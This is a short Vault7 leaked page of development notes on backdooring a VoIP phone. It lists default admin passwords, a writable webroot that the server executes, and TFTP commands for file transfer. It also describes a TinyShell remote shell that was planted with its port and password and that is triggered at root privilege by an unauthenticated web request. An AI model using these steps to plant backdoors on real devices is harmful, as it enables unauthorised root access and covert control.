Vault7: CIA Hacking Tools Revealed

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Development Notes
- phone menu password – 123456
- web interface admin – 123456
System Layout
- webroot = /Opera_Deploy/appWeb/web
- Phone runs linux-2.4.31
- Processor is MIPS-BE.
- Using the hive-builder to cross compile code for the phone.
- The phone temporarily allows ssh access to the admin user via the web interface (Administrator Pages > Maintenance > Secure Shell).
- Files can be transferred to the phone via TFTP.
- phone# tftp -g -r <filename> <hostname> <port>
- wkstn# sudo /usr/sbin/in.tftpd --daemon --port 6969 /tmp (this is for atftpd)
- The web server attempts to execute any page requested by a client. The webroot directory is writable by the admin user.
- TinyShell (tsh) has been compiled for the phone for port 12345 and password "wboKtbEYVTWAVIig". It has been placed in /usr/sbin and the webroot. Additionally, a script named tshd.cmd has also been placed in the webroot. To start tsh, hit this page . Web interface credentials are not required. That page will provide an error, but in the background it will kick off tsh with root privileges. Use the tsh client to connect.